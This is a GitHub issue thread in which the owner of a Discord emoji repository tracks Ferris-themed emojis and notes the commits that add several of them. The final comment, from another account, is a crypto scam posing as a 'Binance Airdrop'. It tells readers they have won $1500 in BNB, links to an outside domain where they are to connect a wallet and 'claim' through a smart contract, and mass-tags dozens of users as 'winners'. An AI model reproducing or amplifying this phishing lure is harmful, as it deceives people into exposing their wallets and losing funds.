### ISSUE TITLE
TODO

### ISSUE THREAD

**Issue by FedericoSchonborn** [FedericoSchonborn/discord-emoji#2]
Emojis I have to do, in no particular order:

- [ ] Ferris + Cat (with Non Binary variant)
- [ ] Ferris What + Ferris OwO
- [ ] Ferris + Love
- [ ] Ferris + Yum
- [ ] Ferris + Tinfoil Hat

**Comment by FedericoSchonborn** [comment]
`ferrisYum` was added in 7974d2af14e8ca069f03f23a07e9d33b963b095c

**Comment by FedericoSchonborn** [comment]
`holyShit` was added in b3fbd9eb1e23604447d47700fa0b9c94ffc492c4

**Comment by FedericoSchonborn** [comment]
`ferrisTinfoil` was added in d93855f94ebbd18e1ea2043f0c497fdafb64e485

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @yinshaojun, @alitourani, @rahmatputrawiranata, @ShekharSahu, @Raymond089, @Xenoxide, @aryanSmalhotra, @iamuchejude, @williamd1k0, @mykaman12, @Jean-pierre14, @alexlevy0, @sapiensfuturus, @huanguanga, @jcb011, @my3t, @PhilienTaylor, @StephonBron, @rishit-singh, @farhadifshari, @XavierXinweiWang, @navanjr, @sunyonghua, @amoghrajesh, @WUXTAOOO, @gbour, @ipproyectosysoluciones, @BossMAN559, @avoinea, @AadiPatangi, @Cqsi, @iradical7, @kebie3, @KingValmond, @ZehuaJiang, @aimeedonah, @mansilladev, @huhjunsuk, @pierregrant, @kaseasaraankasea, @pedrohsampaioo, @dgmdan, @TessaCarmen, @pprathameshmore, @chiemerieokorie, @ChickenMustNotDie, @AmyHumburg, @SaschaWedler, @fyzmesa, @AntoniosKalattas
